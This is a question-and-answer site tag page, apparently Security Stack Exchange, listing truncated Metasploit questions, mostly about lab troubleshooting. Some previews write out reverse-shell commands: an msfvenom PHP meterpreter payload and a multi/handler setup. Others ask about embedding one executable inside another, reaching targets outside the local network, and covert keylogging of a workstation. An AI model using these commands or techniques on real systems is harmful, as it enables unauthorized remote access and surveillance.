Skip to main content

Questions tagged [metasploit]

Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine

0 votes
0 answers
8 views

Getting the ipv4 address of my VM [migrated]

I just installed metasploit2 on VMware and changed its network to a Bridge Adapter. Now I want to get my Metasploit2 IPv4 but when I run ifconfig it shows only IPv6 for eth0. I need IPv4. What should ...
Cyber Practice's user avatar
0 votes
0 answers
98 views

Cannot exploit Metasploitable 2 VM using Tomcat 5.5 on Metasploit with Parrot OS

I've being trying to perform a simple exploit with msfconsole on Metasploitable 2 without any results. I'm using a host-only network adapter with DHCP enabled so I'm getting 192.168.56.104 on the ...
Martin Montas's user avatar
0 votes
0 answers
66 views

How to fix metasploit handler?

My Termux Meterpreter doesn't work. Commands: msfconsole set Proxies http://185.107.56.83:443 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 8080 set ...
Duck's user avatar
  • 11
0 votes
0 answers
73 views

How can I safely write in my resume that I have written a MetaSploit exploit module without making employers nervous?

I have asked this question on The WorkPlace SE site and did not receive any comprehensive answers over there. I have around 10 years of cybersecurity industry experience and have gained proficiency ...
Anthony's user avatar
  • 1,756
0 votes
0 answers
110 views

Double pivoting - proxychains.conf - why should I use 2 entries?

I am studying pivoting and I had a question related to double pivoting. Reading various blogs, I read that it is a common (but not always used) practice to define two entries in the /etc/proxychains....
EEVV's user avatar
  • 11
0 votes
1 answer
112 views

Metasploit Payloads from outside the local network [duplicate]

I created a payload with metasploit and hacked my other computer. But this only works within the local network, right? I would like to know how hackers create payloads that work on targets outside the ...
Bruno Jaquinto's user avatar
0 votes
1 answer
115 views

Using Metasploit on Kali to attack a Linux machine [closed]

Whats wrong with my exploit? I'm trying to attack a Linux machine using Kali. I cannot seem to get the meterpreter session started.
Dennys Perez's user avatar
0 votes
0 answers
115 views

How to embed a PE file to another PE files

So what I want to do basically is what BDFproxy does on the go, I want to modify a file (on the disk) to embed another PE in it and have both working, it does not matter if they work concurrently or ...
LuckyCoder3607's user avatar
1 vote
1 answer
94 views

Metasploit search features returns intersection of results

When I use multiple search criteria in Metasploit it shows the results as an "or" rather than an "and". I see that this was asked several years ago so now I am wondering if this ...
osus71's user avatar
  • 13
1 vote
0 answers
360 views

exploit failed: nameerror undefined local variable or method `sysinfo' persistence service module error [closed]

Recently I have been facing an error while using Metasploit. I was trying to exploit Windows 7 with eternal-blue vulnerability. After creating a meterpreter session I was trying to maintain a ...
shinobi's user avatar
  • 11
1 vote
0 answers
217 views

Create and bind to Metasploit reverse shell on Apple Sillicon system

I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
CJG's user avatar
  • 71
0 votes
1 answer
714 views

Metasploit - error msfvenom unloadable payload

I have been trying to generate a payload using msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php I keep getting this error: "error: unloadable ...
Onuorah 's user avatar
0 votes
0 answers
131 views

Upgrade MSF ssh to meterpreter on a host behind a forwarded host

I'm training on a test network. I managed to snatch some ssh credentials and spawn a shell with msfconsole. Turns out a connection via ssh to 192.168.0.3:2222 forwards me to 192.168.0.4:22. So I have ...
Simon Huenecke's user avatar
0 votes
1 answer
149 views

Arbitrary command execution on remote devices

Is it possible to send a TCP payload to an open port that executes a specific arbitrary command on the target device using Metasploit or any other program? For example with Windows 10 Server OS? I ...
19216811's user avatar
0 votes
0 answers
84 views

Surreptitiously surveil a logged out laptop AD workstation's keyboard with temporary physical access?

I can think of multiple ways to surveil a logged out computer with temporary physical access. The first is installing a hardware keylogger which would enable one to get all the keystrokes from it; ...
Seci Pedia's user avatar

15 30 50 per page
1
2 3 4 5
35